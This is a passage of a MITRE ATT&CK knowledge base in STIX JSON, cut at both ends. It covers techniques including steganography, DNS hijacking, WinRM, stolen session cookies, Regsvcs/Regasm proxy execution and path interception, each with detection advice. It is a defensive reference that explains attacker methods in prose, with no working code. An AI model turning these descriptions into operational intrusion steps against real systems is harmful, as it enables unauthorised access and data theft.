"https://www.sciencealert.com/multiple-computer-viruses-have-been-discovered-in-this-german-nuclear-plant"}, {"source_name": "Sean Gallagher April 2016", "description": "Sean Gallagher 2016, April 27 German nuclear plants fuel rod system swarming with old malware Retrieved. 2019/10/14 ", "url": "https://arstechnica.com/information-technology/2016/04/german-nuclear-plants-fuel-rod-system-swarming-with-old-malware/"}, {"source_name": "Trend Micro April 2016", "description": "Trend Micro 2016, April 27 Malware Discovered in German Nuclear Power Plant Retrieved. 2019/10/14 ", "url": "https://www.trendmicro.com/vinfo/us/security/news/cyber-attacks/malware-discovered-in-german-nuclear-power-plant"}], "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "x_mitre_contributors": []}, {"modified": "2023-03-30T21:01:48.815Z", "name": "Steganography", "description": "Adversaries may use steganography techniques in order to prevent the detection of hidden information. Steganographic techniques can be used to hide data in digital media such as images, audio tracks, video clips, or text files.\n\n[Duqu](https://attack.mitre.org/software/S0038) was an early example of malware that used steganography. It encrypted the gathered information from a victim's system and hid it within an image before exfiltrating the image to a C2 server.(Citation: Wikipedia Duqu) \n\nBy the end of 2017, a threat group used\u202fInvoke-PSImage\u202fto hide [PowerShell](https://attack.mitre.org/techniques/T1059/001) commands in an image file (.png) and execute the code on a victim's system. In this particular case the [PowerShell](https://attack.mitre.org/techniques/T1059/001) code downloaded another obfuscated script to gather intelligence from the victim's machine and communicate it back to the adversary.(Citation: McAfee Malicious Doc Targets Pyeongchang Olympics) ", "kill_chain_phases": [{"kill_chain_name": "mitre-attack", "phase_name": "defense-evasion"}], "x_mitre_attack_spec_version": "3.1.0", "x_mitre_detection": "Detection of steganography is difficult unless artifacts are left behind by the obfuscation process that are detectable with a known signature. Look for strings or other signatures left in system artifacts related to decoding steganography.", "x_mitre_domains": ["enterprise-attack"], "x_mitre_is_subtechnique": true, "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_platforms": ["Linux", "macOS", "Windows"], "x_mitre_version": "1.2", "x_mitre_data_sources": [], "type": "attack-pattern", "spec_version": "2.1", "id": "attack-pattern--c2e147a9-d1a8-4074-811a-d8789202d916", "created": "2020-02-05T14:28:16.719Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "external_references": [{"source_name": "mitre-attack", "url": "https://attack.mitre.org/techniques/T1027/003", "external_id": "T1027.003"}, {"source_name": "Wikipedia Duqu", "description": "Wikipedia. (2017, December 29). Duqu. Retrieved April 10, 2018.", "url": "https://en.wikipedia.org/wiki/Duqu"}, {"source_name": "McAfee Malicious Doc Targets Pyeongchang Olympics", "description": "Saavedra-Morales, J., Sherstobitoff, R. (2018, January 6). Malicious Document Targets Pyeongchang Olympics. Retrieved April 10, 2018.", "url": "https://securingtomorrow.mcafee.com/mcafee-labs/malicious-document-targets-pyeongchang-olympics/"}], "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "x_mitre_contributors": []}, {"modified": "2022-05-11T14:00:00.188Z", "name": "DNS Server", "description": "Adversaries may compromise third-party DNS servers that can be used during targeting. During post-compromise activity, adversaries may utilize DNS traffic for various tasks, including for Command and Control (ex: [Application Layer Protocol](https://attack.mitre.org/techniques/T1071)). Instead of setting up their own DNS servers, adversaries may compromise third-party DNS servers in support of operations.\n\nBy compromising DNS servers, adversaries can alter DNS records. Such control can allow for redirection of an organization's traffic, facilitating Collection and Credential Access efforts for the adversary.(Citation: Talos DNSpionage Nov 2018)(Citation: FireEye DNS Hijack 2019) Additionally, adversaries may leverage such control in conjunction with [Digital Certificates](https://attack.mitre.org/techniques/T1588/004) to redirect traffic to adversary-controlled infrastructure, mimicking normal trusted network communications.(Citation: FireEye DNS Hijack 2019)(Citation: Crowdstrike DNS Hijack 2019) Adversaries may also be able to silently create subdomains pointed at malicious servers without tipping off the actual owner of the DNS server.(Citation: CiscoAngler)(Citation: Proofpoint Domain Shadowing)", "kill_chain_phases": [{"kill_chain_name": "mitre-attack", "phase_name": "resource-development"}], "x_mitre_attack_spec_version": "2.1.0", "x_mitre_contributors": ["Jeremy Galloway"], "x_mitre_deprecated": false, "x_mitre_detection": "Consider monitoring for anomalous resolution changes for domain addresses. Efforts may need to be tailored to specific domains of interest as benign resolution changes are a common occurrence on the internet.\n\nMuch of this activity will take place outside the visibility of the target organization, making detection of this behavior difficult. Detection efforts may be focused on related stages of the adversary lifecycle, such as during Command and Control.", "x_mitre_domains": ["enterprise-attack"], "x_mitre_is_subtechnique": true, "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_platforms": ["PRE"], "x_mitre_version": "1.2", "x_mitre_data_sources": [], "type": "attack-pattern", "spec_version": "2.1", "id": "attack-pattern--c2f59d25-87fe-44aa-8f83-e8e59d077bf5", "created": "2020-10-01T00:54:30.869Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": false, "external_references": [{"source_name": "mitre-attack", "url": "https://attack.mitre.org/techniques/T1584/002", "external_id": "T1584.002"}, {"source_name": "FireEye DNS Hijack 2019", "description": "Hirani, M., Jones, S., Read, B. (2019, January 10). Global DNS Hijacking Campaign: DNS Record Manipulation at Scale. Retrieved October 9, 2020.", "url": "https://www.fireeye.com/blog/threat-research/2019/01/global-dns-hijacking-campaign-dns-record-manipulation-at-scale.html"}, {"source_name": "Crowdstrike DNS Hijack 2019", "description": "Matt Dahl. (2019, January 25). Widespread DNS Hijacking Activity Targets Multiple Sectors. Retrieved February 14, 2022.", "url": "https://www.crowdstrike.com/blog/widespread-dns-hijacking-activity-targets-multiple-sectors/"}, {"source_name": "Talos DNSpionage Nov 2018", "description": "Mercer, W., Rascagneres, P. (2018, November 27). DNSpionage Campaign Targets Middle East. Retrieved October 9, 2020.", "url": "https://blog.talosintelligence.com/2018/11/dnspionage-campaign-targets-middle-east.html"}, {"source_name": "CiscoAngler", "description": "Nick Biasini. (2015, March 3). Threat Spotlight: Angler Lurking in the Domain Shadows. Retrieved March 6, 2017.", "url": "https://blogs.cisco.com/security/talos/angler-domain-shadowing"}, {"source_name": "Proofpoint Domain Shadowing", "description": "Proofpoint Staff. (2015, December 15). The shadow knows: Malvertising campaigns use domain shadowing to pull in Angler EK. Retrieved October 16, 2020.", "url": "https://www.proofpoint.com/us/threat-insight/post/The-Shadow-Knows"}], "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"]}, {"modified": "2021-04-29T14:49:39.188Z", "name": "Protocol Impersonation", "description": "Adversaries may impersonate legitimate protocols or web service traffic to disguise command and control activity and thwart analysis efforts. By impersonating legitimate protocols or web services, adversaries can make their command and control traffic blend in with legitimate network traffic. \n\nAdversaries may impersonate a fake SSL/TLS handshake to make it look like subsequent traffic is SSL/TLS encrypted, potentially interfering with some security tooling, or to make the traffic look like it is related with a trusted entity. ", "kill_chain_phases": [{"kill_chain_name": "mitre-attack", "phase_name": "command-and-control"}], "x_mitre_attack_spec_version": "2.1.0", "x_mitre_detection": "Analyze network data for uncommon data flows (e.g., a client sending significantly more data than it receives from a server). Processes utilizing the network that do not normally have network communication or have never been seen before are suspicious. Analyze packet contents to detect communications that do not follow the expected protocol behavior for the port that is being used.(Citation: University of Birmingham C2)", "x_mitre_domains": ["enterprise-attack"], "x_mitre_is_subtechnique": true, "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_platforms": ["Linux", "Windows", "macOS"], "x_mitre_version": "1.0", "x_mitre_data_sources": [], "type": "attack-pattern", "spec_version": "2.1", "id": "attack-pattern--c325b232-d5bc-4dde-a3ec-71f3db9e8adc", "created": "2020-03-15T00:40:27.503Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "external_references": [{"source_name": "mitre-attack", "url": "https://attack.mitre.org/techniques/T1001/003", "external_id": "T1001.003"}, {"source_name": "University of Birmingham C2", "description": "Gardiner, J., Cova, M., Nagaraja, S. (2014, February). Command & Control Understanding, Denying and Detecting. Retrieved April 20, 2016.", "url": "https://arxiv.org/ftp/arxiv/papers/1408/1408.1136.pdf"}], "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "x_mitre_contributors": []}, {"modified": "2023-05-09T14:00:00.188Z", "name": "Query Registry", "description": "Adversaries may interact with the Windows Registry to gather information about the system, configuration, and installed software.\n\nThe Registry contains a significant amount of information about the operating system, configuration, software, and security.(Citation: Wikipedia Windows Registry) Information can easily be queried using the [Reg](https://attack.mitre.org/software/S0075) utility, though other means to access the Registry exist. Some of the information may help adversaries to further their operation within a network. Adversaries may use the information from [Query Registry](https://attack.mitre.org/techniques/T1012) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.", "kill_chain_phases": [{"kill_chain_name": "mitre-attack", "phase_name": "discovery"}], "x_mitre_attack_spec_version": "3.1.0", "x_mitre_deprecated": false, "x_mitre_detection": "System and network discovery techniques normally occur throughout an operation as an adversary learns the environment. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as Lateral Movement, based on the information obtained.\n\nInteraction with the Windows Registry may come from the command line using utilities such as [Reg](https://attack.mitre.org/software/S0075) or through running malware that may interact with the Registry through an API. Command-line invocation of utilities used to query the Registry may be detected through process and command-line monitoring. Remote access tools with built-in features may interact directly with the Windows API to gather information. Information may also be acquired through Windows system management tools such as [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) and [PowerShell](https://attack.mitre.org/techniques/T1059/001).", "x_mitre_domains": ["enterprise-attack"], "x_mitre_is_subtechnique": false, "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_platforms": ["Windows"], "x_mitre_version": "1.3", "x_mitre_data_sources": [], "type": "attack-pattern", "spec_version": "2.1", "id": "attack-pattern--c32f7008-9fea-41f7-8366-5eb9b74bd896", "created": "2017-05-31T21:30:25.584Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": false, "external_references": [{"source_name": "mitre-attack", "url": "https://attack.mitre.org/techniques/T1012", "external_id": "T1012"}, {"source_name": "Wikipedia Windows Registry", "description": "Wikipedia. (n.d.). Windows Registry. Retrieved February 2, 2015.", "url": "https://en.wikipedia.org/wiki/Windows_Registry"}], "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "x_mitre_contributors": []}, {"modified": "2021-04-29T14:49:39.188Z", "name": "Data Transfer Size Limits", "description": "An adversary may exfiltrate data in fixed size chunks instead of whole files or limit packet sizes below certain thresholds. This approach may be used to avoid triggering network data transfer threshold alerts.", "kill_chain_phases": [{"kill_chain_name": "mitre-attack", "phase_name": "exfiltration"}], "x_mitre_attack_spec_version": "2.1.0", "x_mitre_detection": "Analyze network data for uncommon data flows (e.g., a client sending significantly more data than it receives from a server). If a process maintains a long connection during which it consistently sends fixed size data packets or a process opens connections and sends fixed sized data packets at regular intervals, it may be performing an aggregate data transfer. Processes utilizing the network that do not normally have network communication or have never been seen before are suspicious. Analyze packet contents to detect communications that do not follow the expected protocol behavior for the port that is being used. (Citation: University of Birmingham C2)", "x_mitre_domains": ["enterprise-attack"], "x_mitre_is_subtechnique": false, "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_platforms": ["Linux", "macOS", "Windows"], "x_mitre_version": "1.0", "x_mitre_data_sources": [], "type": "attack-pattern", "spec_version": "2.1", "id": "attack-pattern--c3888c54-775d-4b2f-b759-75a2ececcbfd", "created": "2017-05-31T21:30:34.523Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "external_references": [{"source_name": "mitre-attack", "url": "https://attack.mitre.org/techniques/T1030", "external_id": "T1030"}, {"source_name": "University of Birmingham C2", "description": "Gardiner, J., Cova, M., Nagaraja, S. (2014, February). Command & Control Understanding, Denying and Detecting. Retrieved April 20, 2016.", "url": "https://arxiv.org/ftp/arxiv/papers/1408/1408.1136.pdf"}], "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "x_mitre_contributors": []}, {"modified": "2022-04-25T14:00:00.188Z", "name": "Windows Remote Management", "description": "Windows Remote Management (WinRM) is the name of both a Windows service and a protocol that allows a user to interact with a remote system (e.g., run an executable, modify the Registry, modify services). (Citation: Microsoft WinRM) It may be called with the winrm command or by any number of programs such as PowerShell. (Citation: Jacobsen 2014)", "kill_chain_phases": [{"kill_chain_name": "mitre-attack", "phase_name": "execution"}, {"kill_chain_name": "mitre-attack", "phase_name": "lateral-movement"}], "x_mitre_attack_spec_version": "2.1.0", "x_mitre_detection": "Monitor use of WinRM within an environment by tracking service execution. If it is not normally used or is disabled, then this may be an indicator of suspicious behavior. Monitor processes created and actions taken by the WinRM process or a WinRM invoked script to correlate it with other related events. (Citation: Medium Detecting Lateral Movement)", "x_mitre_domains": ["enterprise-attack"], "x_mitre_is_subtechnique": false, "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_platforms": ["Windows"], "x_mitre_version": "1.1", "x_mitre_permissions_required": ["User", "Administrator"], "x_mitre_remote_support": true, "x_mitre_system_requirements": ["WinRM listener turned on and configured on remote system"], "type": "attack-pattern", "spec_version": "2.1", "id": "attack-pattern--c3bce4f4-9795-46c6-976e-8676300bbc39", "created": "2017-05-31T21:30:33.723Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": true, "external_references": [{"source_name": "mitre-attack", "url": "https://attack.mitre.org/techniques/T1028", "external_id": "T1028"}, {"source_name": "capec", "url": "https://capec.mitre.org/data/definitions/555.html", "external_id": "CAPEC-555"}, {"source_name": "Microsoft WinRM", "description": "Microsoft. (n.d.). Windows Remote Management. Retrieved November 12, 2014.", "url": "http://msdn.microsoft.com/en-us/library/aa384426"}, {"source_name": "Jacobsen 2014", "description": "Jacobsen, K. (2014, May 16). Lateral Movement with PowerShell[slides]. Retrieved November 12, 2014.", "url": "https://www.slideshare.net/kieranjacobsen/lateral-movement-with-power-shell-2"}, {"source_name": "Medium Detecting Lateral Movement", "description": "French, D. (2018, September 30). Detecting Lateral Movement Using Sysmon and Splunk. Retrieved October 11, 2019.", "url": "https://medium.com/threatpunter/detecting-lateral-movement-using-sysmon-and-splunk-318d3be141bc"}], "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "x_mitre_contributors": [], "x_mitre_data_sources": []}, {"modified": "2023-09-19T21:26:24.725Z", "name": "Web Session Cookie", "description": "Adversaries can use stolen session cookies to authenticate to web applications and services. This technique bypasses some multi-factor authentication protocols since the session is already authenticated.(Citation: Pass The Cookie)\n\nAuthentication cookies are commonly used in web applications, including cloud-based services, after a user has authenticated to the service so credentials are not passed and re-authentication does not need to occur as frequently. Cookies are often valid for an extended period of time, even if the web application is not actively used. After the cookie is obtained through [Steal Web Session Cookie](https://attack.mitre.org/techniques/T1539) or [Web Cookies](https://attack.mitre.org/techniques/T1606/001), the adversary may then import the cookie into a browser they control and is then able to use the site or application as the user for as long as the session cookie is active. Once logged into the site, an adversary can access sensitive information, read email, or perform actions that the victim account has permissions to perform.\n\nThere have been examples of malware targeting session cookies to bypass multi-factor authentication systems.(Citation: Unit 42 Mac Crypto Cookies January 2019)", "kill_chain_phases": [{"kill_chain_name": "mitre-attack", "phase_name": "defense-evasion"}, {"kill_chain_name": "mitre-attack", "phase_name": "lateral-movement"}], "x_mitre_attack_spec_version": "3.1.0", "x_mitre_contributors": ["Johann Rehberger", "Jack Burns, HubSpot"], "x_mitre_deprecated": false, "x_mitre_detection": "Monitor for anomalous access of websites and cloud-based applications by the same user in different locations or by different systems that do not match expected configurations.", "x_mitre_domains": ["enterprise-attack"], "x_mitre_is_subtechnique": true, "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_platforms": ["Office 365", "SaaS", "Google Workspace", "IaaS"], "x_mitre_version": "1.3", "x_mitre_data_sources": [], "x_mitre_defense_bypassed": ["System Access Controls"], "type": "attack-pattern", "spec_version": "2.1", "id": "attack-pattern--c3c8c916-2f3c-4e71-94b2-240bdfc996f0", "created": "2020-01-30T17:48:49.395Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": false, "external_references": [{"source_name": "mitre-attack", "url": "https://attack.mitre.org/techniques/T1550/004", "external_id": "T1550.004"}, {"source_name": "Unit 42 Mac Crypto Cookies January 2019", "description": "Chen, Y., Hu, W., Xu, Z., et. al. (2019, January 31). Mac Malware Steals Cryptocurrency Exchanges\u2019 Cookies. Retrieved October 14, 2019.", "url": "https://unit42.paloaltonetworks.com/mac-malware-steals-cryptocurrency-exchanges-cookies/"}, {"source_name": "Pass The Cookie", "description": "Rehberger, J. (2018, December). Pivot to the Cloud using Pass the Cookie. Retrieved April 5, 2019.", "url": "https://wunderwuzzi23.github.io/blog/passthecookie.html"}], "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"]}, {"modified": "2023-08-14T14:55:07.432Z", "name": "Domain Accounts", "description": "Adversaries may obtain and abuse credentials of a domain account as a means of gaining Initial Access, Persistence, Privilege Escalation, or Defense Evasion.(Citation: TechNet Credential Theft) Domain accounts are those managed by Active Directory Domain Services where access and permissions are configured across systems and services that are part of that domain. Domain accounts can cover users, administrators, and services.(Citation: Microsoft AD Accounts)\n\nAdversaries may compromise domain accounts, some with a high level of privileges, through various means such as [OS Credential Dumping](https://attack.mitre.org/techniques/T1003) or password reuse, allowing access to privileged resources of the domain.", "kill_chain_phases": [{"kill_chain_name": "mitre-attack", "phase_name": "defense-evasion"}, {"kill_chain_name": "mitre-attack", "phase_name": "persistence"}, {"kill_chain_name": "mitre-attack", "phase_name": "privilege-escalation"}, {"kill_chain_name": "mitre-attack", "phase_name": "initial-access"}], "x_mitre_attack_spec_version": "3.1.0", "x_mitre_contributors": ["Jon Sternstein, Stern Security"], "x_mitre_deprecated": false, "x_mitre_detection": "Configure robust, consistent account activity audit policies across the enterprise and with externally accessible services.(Citation: TechNet Audit Policy) Look for suspicious account behavior across systems that share accounts, either user, admin, or service accounts. Examples: one account logged into multiple systems simultaneously; multiple accounts logged into the same machine simultaneously; accounts logged in at odd times or outside of business hours. Activity may be from interactive login sessions or process ownership from accounts being used to execute binaries on a remote system as a particular account. Correlate other security systems with login information (e.g., a user has an active login session but has not entered the building or does not have VPN access).\n\nOn Linux, check logs and other artifacts created by use of domain authentication services, such as the System Security Services Daemon (sssd).(Citation: Ubuntu SSSD Docs) \n\nPerform regular audits of domain accounts to detect accounts that may have been created by an adversary for persistence.", "x_mitre_domains": ["enterprise-attack"], "x_mitre_is_subtechnique": true, "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_platforms": ["Linux", "macOS", "Windows"], "x_mitre_version": "1.4", "x_mitre_data_sources": [], "x_mitre_permissions_required": ["User", "Administrator"], "type": "attack-pattern", "spec_version": "2.1", "id": "attack-pattern--c3d4bdd9-2cfe-4a80-9d0c-07a29ecdce8f", "created": "2020-03-13T20:21:54.758Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": false, "external_references": [{"source_name": "mitre-attack", "url": "https://attack.mitre.org/techniques/T1078/002", "external_id": "T1078.002"}, {"source_name": "TechNet Credential Theft", "description": "Microsoft. (2016, April 15). Attractive Accounts for Credential Theft. Retrieved June 3, 2016.", "url": "https://technet.microsoft.com/en-us/library/dn535501.aspx"}, {"source_name": "TechNet Audit Policy", "description": "Microsoft. (2016, April 15). Audit Policy Recommendations. Retrieved June 3, 2016.", "url": "https://technet.microsoft.com/en-us/library/dn487457.aspx"}, {"source_name": "Microsoft AD Accounts", "description": "Microsoft. (2019, August 23). Active Directory Accounts. Retrieved March 13, 2020.", "url": "https://docs.microsoft.com/en-us/windows/security/identity-protection/access-control/active-directory-accounts"}, {"source_name": "Ubuntu SSSD Docs", "description": "Ubuntu. (n.d.). SSSD. Retrieved September 23, 2021.", "url": "https://ubuntu.com/server/docs/service-sssd"}], "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"]}, {"modified": "2022-05-11T14:00:00.188Z", "name": "Regsvcs/Regasm", "description": "Adversaries may abuse Regsvcs and Regasm to proxy execution of code through a trusted Windows utility. Regsvcs and Regasm are Windows command-line utilities that are used to register .NET [Component Object Model](https://attack.mitre.org/techniques/T1559/001) (COM) assemblies. Both are binaries that may be digitally signed by Microsoft. (Citation: MSDN Regsvcs) (Citation: MSDN Regasm)\n\nBoth utilities may be used to bypass application control through use of attributes within the binary to specify code that should be run before registration or unregistration: [ComRegisterFunction] or [ComUnregisterFunction] respectively. The code with the registration and unregistration attributes will be executed even if the process is run under insufficient privileges and fails to execute. (Citation: LOLBAS Regsvcs)(Citation: LOLBAS Regasm)", "kill_chain_phases": [{"kill_chain_name": "mitre-attack", "phase_name": "defense-evasion"}], "x_mitre_attack_spec_version": "2.1.0", "x_mitre_contributors": ["Casey Smith"], "x_mitre_detection": "Use process monitoring to monitor the execution and arguments of Regsvcs.exe and Regasm.exe. Compare recent invocations of Regsvcs.exe and Regasm.exe with prior history of known good arguments and executed binaries to determine anomalous and potentially adversarial activity. Command arguments used before and after Regsvcs.exe or Regasm.exe invocation may also be useful in determining the origin and purpose of the binary being executed.", "x_mitre_domains": ["enterprise-attack"], "x_mitre_is_subtechnique": true, "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_platforms": ["Windows"], "x_mitre_version": "2.0", "x_mitre_data_sources": [], "x_mitre_defense_bypassed": ["Digital Certificate Validation", "Application control"], "x_mitre_permissions_required": ["User", "Administrator"], "type": "attack-pattern", "spec_version": "2.1", "id": "attack-pattern--c48a67ee-b657-45c1-91bf-6cdbe27205f8", "created": "2020-01-23T19:42:16.439Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "external_references": [{"source_name": "mitre-attack", "url": "https://attack.mitre.org/techniques/T1218/009", "external_id": "T1218.009"}, {"source_name": "MSDN Regsvcs", "description": "Microsoft. (n.d.). Regsvcs.exe (.NET Services Installation Tool). Retrieved July 1, 2016.", "url": "https://msdn.microsoft.com/en-us/library/04za0hca.aspx"}, {"source_name": "MSDN Regasm", "description": "Microsoft. (n.d.). Regasm.exe (Assembly Registration Tool). Retrieved July 1, 2016.", "url": "https://msdn.microsoft.com/en-us/library/tzat5yw6.aspx"}, {"source_name": "LOLBAS Regsvcs", "description": "LOLBAS. (n.d.). Regsvcs.exe. Retrieved July 31, 2019.", "url": "https://lolbas-project.github.io/lolbas/Binaries/Regsvcs/"}, {"source_name": "LOLBAS Regasm", "description": "LOLBAS. (n.d.). Regasm.exe. Retrieved July 31, 2019.", "url": "https://lolbas-project.github.io/lolbas/Binaries/Regasm/"}], "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"]}, {"modified": "2021-01-27T14:49:39.188Z", "name": "Path Interception", "description": "**This technique has been deprecated. Please use [Path Interception by PATH Environment Variable](https://attack.mitre.org/techniques/T1574/007), [Path Interception by Search Order Hijacking](https://attack.mitre.org/techniques/T1574/008), and/or [Path Interception by Unquoted Path](https://attack.mitre.org/techniques/T1574/009).**\n\nPath interception occurs when an executable is placed in a specific path so that it is executed by an application instead of the intended target. One example of this was the use of a copy of [cmd](https://attack.mitre.org/software/S0106) in the current working directory of a vulnerable application that loads a CMD or BAT file with the CreateProcess function. (Citation: TechNet MS14-019)\n\nThere are multiple distinct weaknesses or misconfigurations that adversaries may take advantage of when performing path interception: unquoted paths, path environment variable misconfigurations, and search order hijacking. The first vulnerability deals with full program paths, while the second and third occur when program paths are not specified. These techniques can be used for persistence if executables are called on a regular basis, as well as privilege escalation if intercepted executables are started by a higher privileged process.\n\n### Unquoted Paths\nService paths (stored in Windows Registry keys) (Citation: Microsoft Subkey) and shortcut paths are vulnerable to path interception if the path has one or more spaces and is not surrounded by quotation marks (e.g., C:\\unsafe path with space\\program.exe vs. \"C:\\safe path with space\\program.exe\"). (Citation: Baggett 2012) An adversary can place an executable in a higher level directory of the path, and Windows will resolve that executable instead of the intended executable. For example, if the path in a shortcut is C:\\program files\\myapp.exe, an adversary may create a program at C:\\program.exe that will be run instead of the intended program. (Citation: SecurityBoulevard Unquoted Services APR 2018) (Citation: SploitSpren Windows Priv Jan 2018)\n\n### PATH Environment Variable Misconfiguration\nThe PATH environment variable contains a list of directories. Certain methods of executing a program (namely using cmd.exe or the command-line) rely solely on the PATH environment variable to determine the locations that are searched for a program when the path for the program is not given. If any directories are listed in the PATH environment variable before the Windows directory, %SystemRoot%\\system32 (e.g., C:\\Windows\\system32), a program may be placed in the preceding directory that is named the same as a Windows program (such as cmd, PowerShell, or Python), which will be executed when that command is executed from a script or command-line.\n\nFor example, if C:\\example path precedes C:\\Windows\\system32 is in the PATH environment variable, a program that is named net.exe and placed in C:\\example path will be called instead of the Windows system \"net\" when \"net\" is executed from the command-line.\n\n### Search Order Hijacking\nSearch order hijacking occurs when an adversary abuses the order in which Windows searches for programs that are not given a path. The search order differs depending on the method that is used to execute the program. (Citation: Microsoft CreateProcess) (Citation: Hill NT Shell) (Citation: Microsoft WinExec) However, it is common for Windows to search in the directory of the initiating program before searching through the Windows system directory. An adversary who finds a program vulnerable to search order hijacking (i.e., a program that does not specify the path to an executable) may take advantage of this vulnerability by creating a program named after the improperly specified program and placing it within the initiating program's directory.\n\nFor example, \"example.exe\" runs \"cmd.exe\" with the command-line argument net user. An adversary may place a program called \"net.exe\" within the same directory as example.exe, \"net.exe\" will be run instead of the Windows system utility net. In addition, if an adversary places a program called \"net.com\" in the same directory as \"net.exe\", then cmd.exe /C net user will execute \"net.com\" instead of \"net.exe\" due to the order of executable extensions defined under PATHEXT. (Citation: MSDN Environment Property)\n\nSearch order hijacking is also a common practice for hijacking DLL loads and is covered in [DLL Search Order Hijacking](https://attack.mitre.org/techniques/T1038).", "kill_chain_phases": [{"kill_chain_name": "mitre-attack", "phase_name": "persistence"}, {"kill_chain_name": "mitre-attack", "phase_name": "privilege-escalation"}], "x_mitre_attack_spec_version": "2.1.0", "x_mitre_contributors": ["Stefan Kanthak"], "x_mitre_deprecated": true, "x_mitre_detection": "Monitor file creation for files named after partial directories and in locations that may be searched for common processes through the environment variable, or otherwise should not be user writable. Monitor the executing process for process executable paths that are named for partial directories. Monitor file creation for programs that are named after Windows system programs or programs commonly executed without a path (such as \"findstr,\" \"net,\" and \"python\"). If this activity occurs outside of known administration activity, upgrades, installations, or patches, then it may be suspicious. \n\nData and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as network connections made for Command and Control, learning details about the environment through Discovery, and Lateral Movement.", "x_mitre_domains": ["enterprise-attack"], "x_mitre_is_subtechnique": false, "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_platforms": ["Windows"], "x_mitre_version": "1.0", "x_mitre_effective_permissions": ["User", "Administrator", "SYSTEM"], "x_mitre_permissions_required": ["User", "Administrator", "SYSTEM"], "type": "attack-pattern", "spec_version": "2.1", "id": "attack-pattern--c4ad009b-6e13-4419-8d21-918a1652de02", "created": "2017-05-31T21:30:36.140Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": false, "external_references": [{"source_name": "mitre-attack", "url": "https://attack.mitre.org/techniques/T1034", "external_id": "T1034"}, {"source_name": "capec", "url": "https://capec.mitre.org/data/definitions/159.html", "external_id": "CAPEC-159"}, {"source_name": "TechNet MS14-019", "description": "Nagaraju, S. (2014, April 8). MS14-019 \u2013 Fixing a binary hijacking via .cmd or .bat file. Retrieved July 25, 2016.", "url": "https://blogs.technet.microsoft.com/srd/2014/04/08/ms14-019-fixing-a-binary-hijacking-via-cmd-or-bat-file/"}, {"source_name": "Microsoft Subkey", "description": "Microsoft. (n.d.). CurrentControlSet\\Services Subkey Entries. Retrieved November 30, 2014.", "url": "http://support.microsoft.com/KB/103000"}, {"source_name": "Baggett 2012", "description": "Baggett, M. (2012, November 8). Help eliminate unquoted path vulnerabilities. Retrieved December 4, 2014.", "url": "https://isc.sans.edu/diary/Help+eliminate+unquoted+path+vulnerabilities/14464"}, {"source_name": "SecurityBoulevard Unquoted Services APR 2018", "description": "HackHappy. (2018, April 23). Windows Privilege Escalation \u2013 Unquoted Services. Retrieved August 10, 2018.", "url": "https://securityboulevard.com/2018/04/windows-privilege-escalation-unquoted-services/"}, {"source_name": "SploitSpren Windows Priv Jan 2018", "description": "McFarland, R. (2018, January 26). Windows Privilege Escalation Guide. Retrieved August 10, 2018.", "url": "https://www.sploitspren.com/2018-01-26-Windows-Privilege-Escalation-Guide/"}, {"source_name": "Microsoft CreateProcess", "description": "Microsoft. (n.d.). CreateProcess function. Retrieved December 5, 2014.", "url": "http://msdn.microsoft.com/en-us/library/ms682425"}, {"source_name": "Hill NT Shell", "description": "Hill, T. (n.d.). Windows NT Command Shell. Retrieved December 5, 2014.", "url": "http://technet.microsoft.com/en-us/library/cc723564.aspx#XSLTsection127121120120"}, {"source_name": "Microsoft WinExec", "description": "Microsoft. (n.d.). WinExec function. Retrieved December 5, 2014.", "url": "http://msdn.microsoft.com/en-us/library/ms687393"}, {"source_name": "MSDN Environment Property", "description": "Microsoft. (n.d.). Environment Property. Retrieved July 27, 2016.", "url": 